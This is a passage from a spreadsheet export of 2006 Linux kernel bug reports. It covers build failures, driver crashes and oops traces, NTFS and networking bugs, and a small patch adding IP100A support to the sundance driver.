8100-8107 : vt596_smbus Steps to reproduce: - Install kernel 2.6.16.17 (on this machine) - reboot with USB2.0 devices connected</t>
  </si>
  <si>
    <t>Kernel 2.6.16.19-20  Not Compile with GCC 4.1.1</t>
  </si>
  <si>
    <t>Kernel 2.6.16.19</t>
  </si>
  <si>
    <t>2006-06-05 07:09 UTC</t>
  </si>
  <si>
    <t>2008-03-25 03:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: AlphaSlack Hardware Environment: ALPHA DS 10L Software Environment: lINUX Problem Description: During the compilation happened this : CC arch/alpha/kernel/core_cia.o {standard input}: Assembler messages: {standard input}:395: Error: macro requires $at register while noat in effect {standard input}:419: Error: macro requires $at register while noat in effect {standard input}:442: Error: macro requires $at register while noat in effect {standard input}:460: Error: macro requires $at register while noat in effect {standard input}:512: Error: macro requires $at register while noat in effect {standard input}:536: Error: macro requires $at register while noat in effect {standard input}:559: Error: macro requires $at register while noat in effect {standard input}:577: Error: macro requires $at register while noat in effect make[1]: *** [arch/alpha/kernel/core_cia.o] Error 1 make: *** [arch/alpha/kernel] Error 2 and the compilation stop. Steps to reproduce:</t>
  </si>
  <si>
    <t>dell e1505 core dual: With 2.6.17 on e1505, after resume from suspend to ram, keyboard does not work</t>
  </si>
  <si>
    <t>2.6.18rc4</t>
  </si>
  <si>
    <t>2006-06-05 08:07 UTC</t>
  </si>
  <si>
    <t>Ted Logan</t>
  </si>
  <si>
    <t>2007-06-02 14:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.19 Distribution: fedora core 5 Hardware Environment: dell e1505 Software Environment: fedore core 5/gnome Problem Description: keyboard does not work after resume from suspend to ram Steps to reproduce: boot kernel 2.6.17-rc5 and try suspend to ram, then resume.</t>
  </si>
  <si>
    <t>2.6.16-gentoo-r7</t>
  </si>
  <si>
    <t>os_wait_semaphore: Failed to acquire semaphore hang on boot</t>
  </si>
  <si>
    <t>2.6.16.2</t>
  </si>
  <si>
    <t>2006-06-10 18:01 UTC</t>
  </si>
  <si>
    <t>Patrick Horn</t>
  </si>
  <si>
    <t>2006-08-10 00:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian etch (self-compiled kernel) Hardware Environment: i386 P4 2.6 GHZ ACPI/Hyperthreading+SMP Software Environment: gcc 4.0.3-3-debian Problem Description: On boot, right after printing "ACPI (supports S0 S1 S4 S5)" I get a series of errors: [17179574.336000] osl-0856 [07] os_wait_semaphore : Failed to acquire semaphore[c19de8a0|1|0], AE_TIME [17179574.336000] ACPI Exception (utmutex-0257): AE_TIME, Thread 0 could not acquire Mutex [8] [20060127] Sometimes, this does not happen at all. Sometimes it happens only 2 times or 8 times. But occasionally (usually in the first boot of the day), the kernel repeats this error indefinitely (continuously scrolling console). Rebooting (hard reset) will usually allow the computer to correctly reboot.</t>
  </si>
  <si>
    <t>TC crash and rule freeze</t>
  </si>
  <si>
    <t>2.6.16-gentoo-r6</t>
  </si>
  <si>
    <t>2006-06-12 10:29 UTC</t>
  </si>
  <si>
    <t>2008-01-28 22:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16-gentoo-r6 Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge: Intel Corporation 82865G/PE/P DRAM Controller/Host-Hub Interface (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82865G Integrated Graphics Controller (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev c2) 00:1f.0 ISA bridge: Intel Corporation 82801EB/ER (ICH5/ICH5R) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) 01:09.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 05) 01:0a.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 05) 01:0b.0 SCSI storage controller: Adaptec ASC-39320 U320 (rev 03) 01:0b.1 SCSI storage controller: Adaptec ASC-39320 U320 (rev 03) Software Environment: sys-apps/iproute2-2.6.16.20060323 Problem Description: #cat dmeseg Unable to handle kernel NULL pointer dereference at virtual address 0000000c printing eip: c0217c26 *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: sch_sfq cls_u32 sch_red sch_htb iptable_filter ip_tables x_tables uhci_hcd ehci_hcd usbcore CPU: 0 EIP: 0060:[&lt;c0217c26&gt;] Not tainted VLI EFLAGS: 00010287 (2.6.16-gentoo-r6 #2) EIP is at __rb_erase_color+0x94/0x1ad eax: f55f4954 ebx: f724bb54 ecx: f724bb54 edx: 00000000 esi: 00000000 edi: f7679468 ebp: f7679468 esp: f676bbbc ds: 007b es: 007b ss: 0068 Process tc (pid: 24294, threadinfo=f676a000 task=f7d7da90) Stack: &lt;0&gt;f724bb54 f7679468 00000000 e6bbf154 00000000 c0217e36 00000000 f724bb54 f7679468 e6bbf000 e6bbf06c f7679000 f7679080 f8903366 e6bbf154 f7679468 00000004 000000d0 00000000 00010006 000103c9 f7679000 c0311ffa f7679000 Call Trace: [&lt;c0217e36&gt;] rb_erase+0xf7/0x12d [&lt;f8903366&gt;] htb_destroy_class+0xec/0x15d [sch_htb] [&lt;c0311ffa&gt;] tc_ctl_tclass+0x1b1/0x288 [&lt;c030d69e&gt;] rtnetlink_dump_ifinfo+0x6c/0x89 [&lt;c030dcef&gt;] rtnetlink_rcv_msg+0x171/0x233 [&lt;c031759f&gt;] netlink_dump+0x94/0x1e2 [&lt;c030db7e&gt;] rtnetlink_rcv_msg+0x0/0x233 [&lt;c0317a45&gt;] netlink_rcv_skb+0x46/0xad [&lt;c030db7e&gt;] rtnetlink_rcv_msg+0x0/0x233 [&lt;c0317aec&gt;] netlink_run_queue+0x40/0xd0 [&lt;c030db7e&gt;] rtnetlink_rcv_msg+0x0/0x233 [&lt;c030db5e&gt;] rtnetlink_rcv+0x2e/0x4e [&lt;c030db7e&gt;] rtnetlink_rcv_msg+0x0/0x233 [&lt;c031735c&gt;] netlink_data_ready+0x60/0x62 [&lt;c03164ed&gt;] netlink_sendskb+0x32/0x61 [&lt;c031704d&gt;] netlink_sendmsg+0x291/0x304 [&lt;c02f9b0d&gt;] sock_sendmsg+0xeb/0x10d [&lt;c02f9b0d&gt;] sock_sendmsg+0xeb/0x10d [&lt;c0131fa6&gt;] autoremove_wake_function+0x0/0x57 [&lt;c021a084&gt;] copy_from_user+0x46/0x7e [&lt;c0300ae4&gt;] verify_iovec+0x44/0x9e [&lt;c02fb525&gt;] sys_sendmsg+0x15a/0x272 [&lt;c0140ca6&gt;] filemap_nopage+0x30d/0x38a [&lt;c0152e83&gt;] page_add_file_rmap+0x2a/0x2e [&lt;c014e014&gt;] do_no_page+0x219/0x278 [&lt;c021a084&gt;] copy_from_user+0x46/0x7e [&lt;c02fbaf7&gt;] sys_socketcall+0x28d/0x294 [&lt;c0102ca7&gt;] sysenter_past_esp+0x54/0x75 Code: 04 01 00 00 00 c7 43 04 00 00 00 00 89 7c 24 04 89 1c 24 e8 6b fe ff ff 8b 53 0c eb 8e 8b 53 08 8b 72 04 85 f6 0f 84 82 00 00 00 &lt;8b&gt; 4a 0c 85 c9 74 0a 83 79 04 01 0f 85 00 01 00 00 8b 72 08 85 Steps to reproduce:</t>
  </si>
  <si>
    <t>BUG: soft lockup detected on CPU#0! / ksoftirqd takse 100% CPU</t>
  </si>
  <si>
    <t>2006-06-12 16:07 UTC</t>
  </si>
  <si>
    <t>2008-03-24 18:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: (unknown) Distribution: Gentoo Hardware Environment: 2x Xeon 2.66, 1 GB RAM, NICS: 2 x e1000, and one double port e100. Based on Intel E7501 architecture (2U rack Intel chassis). Software Environment: quagga 0.98.6 Problem Description: ksoftirqd/0 takes 100% of CPU. further investigation shows no sing of network flood or something (and also 2 of 3 NICs are e1000 with NAPI). Ocassionaly there are "BUG: soft lockup detected on CPU#0!". Steps to reproduce: There is no simple way to reproduce. I think that everythint started when we attached second provider with BGP support. We are using quagga which injects about 186 000 routes into kernel. When running for a while (at least few hours, sometimes a day) we get 100% usage on ksoftirqd/0 and following messages in logs: BUG: soft lockup detected on CPU#0! Pid: 6506, comm: zebra EIP: 0060:[&lt;c027f6fd&gt;] CPU: 0 EIP is at _spin_lock+0x7/0xf EFLAGS: 00000286 Not tainted (2.6.15.6) EAX: f6203180 EBX: e6fbf000 ECX: 00000000 EDX: f6bec000 ESI: f6203000 EDI: eddb4b80 EBP: fffffff4 DS: 007b ES: 007b CR0: 8005003b CR2: aca6dff0 CR3: 361ad000 CR4: 000006d0 [&lt;c02396f9&gt;] dev_queue_xmit+0xe0/0x203 [&lt;c0250de8&gt;] ip_output+0x1e1/0x237 [&lt;c024f3f5&gt;] ip_forward+0x181/0x1df [&lt;c024e21a&gt;] ip_rcv+0x40c/0x485 [&lt;c0239bd0&gt;] netif_receive_skb+0x12f/0x165 [&lt;f885aa4c&gt;] e1000_clean_rx_irq+0x389/0x410 [e1000] [&lt;f885a1ca&gt;] e1000_clean+0x94/0x12f [e1000] [&lt;c0239d5a&gt;] net_rx_action+0x69/0xf0 [&lt;c011a305&gt;] __do_softirq+0x55/0xbd [&lt;c011a39a&gt;] do_softirq+0x2d/0x31 [&lt;c011a3f8&gt;] local_bh_enable+0x5a/0x65 [&lt;c024a0a1&gt;] rt_run_flush+0x5f/0x80 [&lt;c027623f&gt;] fn_hash_insert+0x352/0x39f [&lt;c027364c&gt;] inet_rtm_newroute+0x57/0x62 [&lt;c02413ed&gt;] rtnetlink_rcv_msg+0x1a8/0x1cb [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c0247c1e&gt;] netlink_rcv_skb+0x3a/0x8b [&lt;c0247cb1&gt;] netlink_run_queue+0x42/0xc3 [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c0241227&gt;] rtnetlink_rcv+0x22/0x40 [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c024764c&gt;] netlink_data_ready+0x17/0x54 [&lt;c0246a99&gt;] netlink_sendskb+0x1f/0x39 [&lt;c0247449&gt;] netlink_sendmsg+0x27b/0x28c [&lt;c0231467&gt;] sock_sendmsg+0xce/0xe9 [&lt;c0112b36&gt;] __wake_up+0x27/0x3b [&lt;c01a6216&gt;] copy_to_user+0x38/0x42 [&lt;c01a625a&gt;] copy_from_user+0x3a/0x60 [&lt;c01a625a&gt;] copy_from_user+0x3a/0x60 [&lt;c0126be2&gt;] autoremove_wake_function+0x0/0x3a [&lt;c0236bcd&gt;] verify_iovec+0x49/0x7f [&lt;c02327f2&gt;] sys_sendmsg+0x152/0x1a8 [&lt;c0147a62&gt;] do_sync_read+0xb8/0xeb [&lt;c01a6216&gt;] copy_to_user+0x38/0x42 [&lt;c0126be2&gt;] autoremove_wake_function+0x0/0x3a [&lt;c0122b7a&gt;] getrusage+0x34/0x43 [&lt;c0168504&gt;] inotify_dentry_parent_queue_event+0x29/0x7c [&lt;c01a625a&gt;] copy_from_user+0x3a/0x60 [&lt;c0232b6b&gt;] sys_socketcall+0x167/0x180 [&lt;c0102433&gt;] sysenter_past_esp+0x54/0x75 BUG: soft lockup detected on CPU#0! Pid: 6506, comm: zebra EIP: 0060:[&lt;f8952052&gt;] CPU: 0 EIP is at u32_classify+0x52/0x170 [cls_u32] EFLAGS: 00000206 Not tainted (2.6.15.6) EAX: e2fbd020 EBX: f48649c0 ECX: 00000010 EDX: 29b09d5a ESI: f48649ec EDI: 00000001 EBP: e2fbd020 DS: 007b ES: 007b CR0: 8005003b CR2: 08154004 CR3: 361ad000 CR4: 000006d0 [&lt;f88462fa&gt;] ipt_do_table+0x2de/0x2fd [ip_tables] [&lt;f883b523&gt;] ip_nat_fn+0x177/0x185 [iptable_nat] [&lt;f88e159f&gt;] ip_refrag+0x23/0x5f [ip_conntrack] [&lt;c0244d82&gt;] tc_classify+0x2c/0x3f [&lt;f895514b&gt;] htb_classify+0x14b/0x1dd [sch_htb] [&lt;f8955638&gt;] htb_enqueue+0x1d/0x13a [sch_htb] [&lt;c02396fd&gt;] dev_queue_xmit+0xe4/0x203 [&lt;c0250de8&gt;] ip_output+0x1e1/0x237 [&lt;c024f3f5&gt;] ip_forward+0x181/0x1df [&lt;c024e21a&gt;] ip_rcv+0x40c/0x485 [&lt;c0239bd0&gt;] netif_receive_skb+0x12f/0x165 [&lt;f885aa4c&gt;] e1000_clean_rx_irq+0x389/0x410 [e1000] [&lt;f885a1ca&gt;] e1000_clean+0x94/0x12f [e1000] [&lt;c0239d5a&gt;] net_rx_action+0x69/0xf0 [&lt;c011a305&gt;] __do_softirq+0x55/0xbd [&lt;c011a39a&gt;] do_softirq+0x2d/0x31 [&lt;c011a3f8&gt;] local_bh_enable+0x5a/0x65 [&lt;c024a0a1&gt;] rt_run_flush+0x5f/0x80 [&lt;c027623f&gt;] fn_hash_insert+0x352/0x39f [&lt;c027364c&gt;] inet_rtm_newroute+0x57/0x62 [&lt;c02413ed&gt;] rtnetlink_rcv_msg+0x1a8/0x1cb [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c0247c1e&gt;] netlink_rcv_skb+0x3a/0x8b [&lt;c0247cb1&gt;] netlink_run_queue+0x42/0xc3 [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c0241227&gt;] rtnetlink_rcv+0x22/0x40 [&lt;c0241245&gt;] rtnetlink_rcv_msg+0x0/0x1cb [&lt;c024764c&gt;] netlink_data_ready+0x17/0x54 [&lt;c0246a99&gt;] netlink_sendskb+0x1f/0x39 [&lt;c0247449&gt;] netlink_sendmsg+0x27b/0x28c [&lt;c0231467&gt;] sock_sendmsg+0xce/0xe9 [&lt;c0112b36&gt;] __wake_up+0x27/0x3b [&lt;c01a625a&gt;] copy_from_user+0x3a/0x60 [&lt;c01a625a&gt;] copy_from_user+0x3a/0x60 [&lt;c0126be2&gt;] autoremove_wake_function+0x0/0x3a [&lt;c0236bcd&gt;] verify_iovec+0x49/0x7f [&lt;c02327f2&gt;] sys_sendmsg+0x152/0x1a8 [&lt;c0147a62&gt;] do_sync_read+0xb8/0xeb [&lt;c0122b7a&gt;] getrusage+0x34/0x43 [&lt;c011d72f&gt;] update_wall_time+0xa/0x32 [&lt;c011d9e5&gt;] do_timer+0x33/0xa9 [&lt;c01a625a&gt;] copy_from_user+0x3a/0x60 [&lt;c0232b6b&gt;] sys_socketcall+0x167/0x180 [&lt;c0102433&gt;] sysenter_past_esp+0x54/0x75 It happens on 2.6.15.6. Tonight I will try 2.6.16.16 with FIB_TRIE instead of FIB_HASH. I am submitting that bug under network but I am not completly sure if it belongs here.</t>
  </si>
  <si>
    <t>Permedia2 framebuffer on E250</t>
  </si>
  <si>
    <t>2006-06-13 13:44 UTC</t>
  </si>
  <si>
    <t>2008-04-24 13:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4.27 Distribution: Debian Sid Hardware Environment: Sun E250 Software Environment: Permedia2 FB Problem Description: I have E250 with Raptor GFX framebuffer. On 2.4.27 works fine but with any kernel which I tested &gt; 2.6.12 frame buffer console looks very ugly and is unreadable fonts is defocusing. Steps to reproduce: Compile kernel with Permedia2 framebuffer enabled on E250</t>
  </si>
  <si>
    <t>(net forcedeth) 0.57 problems at gigabit speeds</t>
  </si>
  <si>
    <t>2006-06-14 11:57 UTC</t>
  </si>
  <si>
    <t>2008-12-04 06:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none known Distribution: 2.6.16.16 Hardware Environment: Asus A8N5X cables to go cat 10ft 5E crossover cable, this one: http://www.cablestogo.com/product.asp?cat%5Fid=705&amp;sku=24513 also a regular 14ft cat6 straight through cable PANDUIT UTPCTG14YL. Software Environment: Mandriva 2006 forcedeth 0.57 from here: http://bugzilla.kernel.org/show_bug.cgi?id=6604 Netpipe 3.6.2 (as RPM from Mandriva) Nettee 0.17 (from here: ftp://saf.bio.caltech.edu/pub/software/linux_or_unix_tools/nettee.tar.gz) Problem Description: forcedeth works well at 100baseT speeds and gets up to about 89Mbits/sec. However, at gigabit speeds the results are bizarre. I wired two machines directly to each other with a cat5E crossover cable. (Later attempts with a straight through Cat6 cable gave the same results.) For gigabit things look pretty good up to about 12Kb sized packets, then the throughput falls dramatically and then slowly increases to a max of just below 100Mbps. I checked with "ethtool eth0" and both sides still reported that they were at 1000 speed in full duplex mode. Oddly I can get more throughput using my own nettee 0.17 than I can with netpipe. Netpipe peaked at around 230 Mbits/sec whereas nettee was able to push 58Mbytes/sec through the same wire. Steps to reproduce: Two nforce4 systems connected by either a straight Cat6 or crossover cat5e cable. (Or probably cat6 crossover or Gigabit switch, but I don't have these.) Verify that eth0 shows 1000 speed and full duplex on both machines. On one do: NPtcp On other do: NPtcp -h nameoffirst For nettee (NAME1,NAME2 must resolve to an IP address, for instance, through /etc/hosts): On NAME1 do: dd if=/dev/zero bs=1024 count=167777216 | \ nettee -in -next NAME2 -v31 -name NAME1 On NAME2 do: nettee -out none -next . -name NAME2</t>
  </si>
  <si>
    <t>sundance driver lacks support for IP 100Achipsets (with patch)</t>
  </si>
  <si>
    <t>2006-06-14 13:51 UTC</t>
  </si>
  <si>
    <t>Pedro Alejandro López-Valencia</t>
  </si>
  <si>
    <t>2006-06-23 09:59 UTC</t>
  </si>
  <si>
    <t>A few days ago I bought a cheap ehternet adapter to replace my old one which died suddenly. It happened to use an IC Plus Corp. IP100A chipset that is not recognized by neither the kernel of my distro of choice nor the latest vainilla kernel. I found a heavily patched driver at the vendor's site, http://www.icplus.com.tw/pp-IP100A.html that I am not qualified to evaluate. After some examination and experimentation, I decided to patch the vainilla kernel sources with the minimal modifications required to have a working network interface. The changes are very small indeed and done against a copy of sundance.c obtained directly from the git repo at kernel.org as of today. I'm using the patched driver now without apparent trouble. Here is the listing (please let me know if this should go to lkml instead): palopezv@fanelia:~/sundance$ rcsdiff -r1.1 -r1.3 -c ./sundance.c &gt; ./sundance_c_ip100a.patch =================================================================== RCS file: ./sundance.c,v retrieving revision 1.1 retrieving revision 1.3 diff -c -r1.1 -r1.3 palopezv@fanelia:~/sundance$ rcsdiff -r1.1 -r1.3 -c ./sundance.c =================================================================== RCS file: ./sundance.c,v retrieving revision 1.1 retrieving revision 1.3 diff -c -r1.1 -r1.3 *** ./sundance.c 2006/06/14 16:04:35 1.1 --- ./sundance.c 2006/06/14 20:06:05 1.3 *************** *** 94,104 **** Version LK1.10 (Philippe De Muyter phdm@macqel.be): - Make 'unblock interface after Tx underrun' work */ #define DRV_NAME "sundance" ! #define DRV_VERSION "1.01+LK1.10" ! #define DRV_RELDATE "28-Oct-2005" /* The user-configurable values. --- 94,107 ---- Version LK1.10 (Philippe De Muyter phdm@macqel.be): - Make 'unblock interface after Tx underrun' work + Version LK1.11 (Pedro Alejandro Lopez-Valencia palopezv at gmail.com): + - Add support for IC Plus Corporation IP100A chipset + */ #define DRV_NAME "sundance" ! #define DRV_VERSION "1.01+LK1.11" ! #define DRV_RELDATE "14-Jun-2006" /* The user-configurable values. *************** *** 287,292 **** --- 290,296 ---- {0x1186, 0x1002, 0x1186, 0x1040, 0, 0, 3}, {0x1186, 0x1002, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 4}, {0x13F0, 0x0201, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 5}, + {0x13F0, 0x0200, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 6}, {0,} }; MODULE_DEVICE_TABLE(pci, sundance_pci_tbl); *************** *** 305,310 **** --- 309,315 ---- {"D-Link DFE-530TXS FAST Ethernet Adapter"}, {"D-Link DL10050-based FAST Ethernet Adapter"}, {"Sundance Technology Alta"}, + {"IC Plus Corporation IP100A FAST Ethernet Adapter"}, {NULL,}, /* 0 terminated list. */ };</t>
  </si>
  <si>
    <t>sky2: IPX protocol causes kernel panic</t>
  </si>
  <si>
    <t>2.6.17-rc6 and previous versions (also 2.6.16.X)</t>
  </si>
  <si>
    <t>2006-06-15 03:27 UTC</t>
  </si>
  <si>
    <t>Stanislaw Baran</t>
  </si>
  <si>
    <t>2006-09-06 09:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian (testing) Hardware Environment: Marvell Yukon 88E8053 on Asus P5LD2 Software Environment: IPX protocol enabled (frame EtherII) Problem Description: "kernel panic" once or twice a day. Problem does not appear when IPX protocol is disabled. System is also stable if sk98lin driver (version 8.40 - available from www. marvell.com) is used instead of sky2. Steps to reproduce: Problem seems to be connected to network traffic. On holidays my system was stable for 2 or 3 days while on workimg day it takes only few hours for system to crash.</t>
  </si>
  <si>
    <t>Dell CERC ATA100/4ch not supported by any driver in 2.6.16</t>
  </si>
  <si>
    <t>2006-06-15 07:20 UTC</t>
  </si>
  <si>
    <t>Torsten Krah</t>
  </si>
  <si>
    <t>2008-05-03 10:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15.6 Distribution: Debian Hardware Environment: Dell Power Edge 1600SC Software Environment: Problem Description: The CERC Controller is not supported anymore by 2.6.16. Steps to reproduce:compile 2.6.16.x and boot. After searching for years i found a debian bug report for 2.6.16, its not really old but is addressing some issue with megaraid controller, i got since 2.6.16 is out. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=369378 I did not found the patch on latest patchset for 2.6.17 ( maybe i've searched not as good as i thought so excuse me if its already in there ) , so i would love to see it in 2.6.17. kind regards Torsten</t>
  </si>
  <si>
    <t>ntfs_flush_dcache_pages causes segmentation fault</t>
  </si>
  <si>
    <t>2006-06-16 17:30 UTC</t>
  </si>
  <si>
    <t>Pauline Ng</t>
  </si>
  <si>
    <t>2006-06-20 00:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:None Distribution: Hardware Environment:mips Software Environment:uCLinux Problem Description:NTFS write support crashes on ntfs_flush_dcache_pages I am mounting a 160GB drive mount -t ntfs /dev/sda1 /var/tmp and copied a file usbtree.txt to usb.if which already exists on my hard drive. The ntfs_flush_dcache_pages () BUG_ON(!nr_pages); do { /* * Warning: Do not do the decrement at the same time as the * call because flush_dcache_page() is a NULL macro on i386 * and hence the decrement never happens. */ flush_dcache_page(pages[nr_pages]); &lt;====CRASH HERE!!! } while (--nr_pages &gt; 0); I have only 1 page to write, nr_pages is 1. The pages that it should flush should be pages[0] instead of pages[nr_pages] which is pages[1] in this case. Because pages[1] is not initialized properly, hence it crashes when I tried to copy a file from one to another. If I modified the code to be like this while (--nr_pages &gt; 0) { flush_dcache_page(pages[nr_pages]); } It works correctly for me. The file copy is sucessful. Below is a capture of the crash and some of my memory dumps using printk /var/tmp # cp usbtree.txt usb.if __ntfs_grab_cache_pages nr_pages 1 page[nr] 0 pages 81243cd0 nr 0 *cached_page 81027140 page[nr] 81027140 pages 81243cd0 nr 0 ntfs_copy_from_user nr pages 1 bytes 1000 kaddr 8138a000 ofs 0 buf 7fac4a90 len 1000 pages 81243cd0 *pages 81027140 last_page 81243cd4 *last_page 805e4dd7 &lt;====== unitialized data kmap_atomic(*last_page, KM_USER0) 2f26e000 &lt;===== uninitialized causing crash ntfs_flush_dcache_pages(81243cd0,1) pages 81243cd0 *page 81027140 nr_pages 1 pages[0] 81027140 nr_pages 1 pages[1] 805e4dd7 nr_pages 1 CPU 0 Unable to handle kernel paging request at virtual address 2f26e000, epc == 80c Oops[#1]: Cpu 0 $ 0 : 00000000 00000008 805e0000 2f26f000 $ 4 : 2f26e000 805e4dd7 804f80b0 00000000 $ 8 : 0001884a 804f8088 805e0000 805e0000 $12 : 805f0000 00000000 805e4a0b 00000010 $16 : 00000000 81243cd0 804a4f58 00001000 $20 : 804a4f30 804a4f0c 81243cd0 805e2ae0 $24 : 81243af8 8010f5a8 $28 : 81242000 81243c78 81243cd4 801fb21c Hi : 00000084 Lo : 9ba54a00 epc : 8010f5b0 r4k_blast_dcache_page_dc32+0x8/0xa0 Not tainted ra : 801fb21c ntfs_file_aio_write_nolock+0xaf4/0x1630 Status: 11005303 KERNEL EXL IE Cause : 00800008 BadVA : 2f26e000 PrId : 00019522 Modules linked in: Process cp (pid: 94, threadinfo=81242000, task=87d193f8) Stack : 81243cd0 805e4dd7 00000001 81243cd4 00001000 ffffffff 00000000 00000000 00001000 805e0000 805f0000 00000000 805e4a0d 00000010 000184ab 000184ab 00000001 80500000 ffffffa1 80500000 80500000 804f8088 81027140 805e4dd7 805e0000 80124138 81242000 81243d08 805e0000 801244fc 11005303 00000084 9ba54a00 000184ab 50804100 8012450c 00000400 805e49d8 00000001 00000000 ... Call Trace: [&lt;80124138&gt;] __call_console_drivers+0x80/0xb0 [&lt;801244fc&gt;] release_console_sem+0xe4/0x310 [&lt;8012450c&gt;] release_console_sem+0xf4/0x310 [&lt;80124a7c&gt;] vprintk+0x354/0x438 [&lt;801fc0ac&gt;] ntfs_file_writev+0x11c/0x2c8 [&lt;8010ce08&gt;] do_page_fault+0x378/0x3f0 [&lt;8010cbe0&gt;] do_page_fault+0x150/0x3f0 [&lt;8013eec8&gt;] autoremove_wake_function+0x0/0x48 [&lt;801fc274&gt;] ntfs_file_write+0x1c/0x28 [&lt;8016aa68&gt;] vfs_write+0x1b8/0x1d0 [&lt;8016a688&gt;] vfs_read+0x100/0x1d0 [&lt;8016ab74&gt;] sys_write+0x54/0xa0 [&lt;80169a18&gt;] do_sys_open+0xf8/0x148 [&lt;8010b3a0&gt;] stack_done+0x20/0x3c Code: 00000000 24831000 00000000 &lt;bc950000&gt; bc950020 bc950040 bc950060 bc95008 Segmentation fault Below is a capture of the crash My paramters at the time is nr_page</t>
  </si>
  <si>
    <t>2.6.17: KConfig Typo in RTC_CLASS</t>
  </si>
  <si>
    <t>2006-06-17 20:55 UTC</t>
  </si>
  <si>
    <t>2006-07-02 13:41 UTC</t>
  </si>
  <si>
    <t>Theres a small typo in the description for RTC_CLASS in 2.6.17: "Generic RTC class support. If you say yes here, you will be allowed to plug one or more RTCs to your system. You will probably want to enable one of more of the interfaces below." "want to enable one of more" I assume should be "or more"</t>
  </si>
  <si>
    <t>modprobe -r ohci1394 hangs or panics</t>
  </si>
  <si>
    <t>2.6.15, 2.6.16</t>
  </si>
  <si>
    <t>2006-06-18 03:40 UTC</t>
  </si>
  <si>
    <t>2006-12-10 08:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Mandrake 10.1 Hardware Environment: x86 K7 uniprocessor two FireWire host adapters (0: TI based, 1394b, 1: VIA based, 1394a) Software Environment: gcc 3.4.1, kernel.org's kernel Problem Description: When "modprobe ohci1394" is followed shortly by "modprobe -r ohci1394" (e.g. 1 second after the previous modprobe finished), one of the following may happen: - kernel panic due to exception in interrupt (happened on 2.6.15.x preempt uniprocessor) or - modprobe -r hangs in D state, as does knodemgrd_0 (happened on 2.6.16.x preempt SMP on a uniprocessor machine, with original drivers as well as with 1394 drivers equivalent to 2.6.17-rc6-mm2 --- i.e. 2.6.17 will also be affected). The knodemgrd_1 slept interruptibly (S state) while the other slept uninterruptibly (D state) right after modprobe -r was issued. This happens with or without other nodes attached to the FireWire ports, with or without eth1394 loaded. There is no problem if a longer pause is put between modprobe and modprobe -r, for example 4 seconds.</t>
  </si>
  <si>
    <t>ATAPI TORiSAN DVD-ROM DRD-N216 freezes on 2.6 kernels</t>
  </si>
  <si>
    <t>2.6.18</t>
  </si>
  <si>
    <t>2006-06-18 15:19 UTC</t>
  </si>
  <si>
    <t>Vlad Codrea</t>
  </si>
  <si>
    <t>2007-08-25 21:19 UTC</t>
  </si>
  <si>
    <t>Albert Lee</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4.20 (Red Hat 9) Distribution: Debian Sid (2.6.16-2-686), SUSE 10.1, Kubuntu 6.06 Hardware Environment: Dell Inspiron 3200 laptop (Pentium II) ATAPI TORiSAN DVD-ROM DRD-N216 Software Environment: Debian Sid (2.6.16-2-686) Problem Description: I am not able to mount any CDs from Linux 2.6.16 because the drive (ATAPI TORiSAN DVD-ROM DRD-N216) freezes. The kernel log containing the boot messages and the messages from the CD reading errors is attached. The CD reading errors start on line 850. The command that triggered the errors was: mount /dev/cdrom /cdrom Interestingly, Red Hat 9, which uses kernel 2.4.20, *can* mount and read from the CD. This leads me to believe that the error entered somewhere in the 2.6 branch. Windows 98 doesn</t>
  </si>
  <si>
    <t>via velocity reports incorrect cable in/out status</t>
  </si>
  <si>
    <t>2006-06-18 15:51 UTC</t>
  </si>
  <si>
    <t>Roy Marples</t>
  </si>
  <si>
    <t>2006-06-23 09:56 UTC</t>
  </si>
  <si>
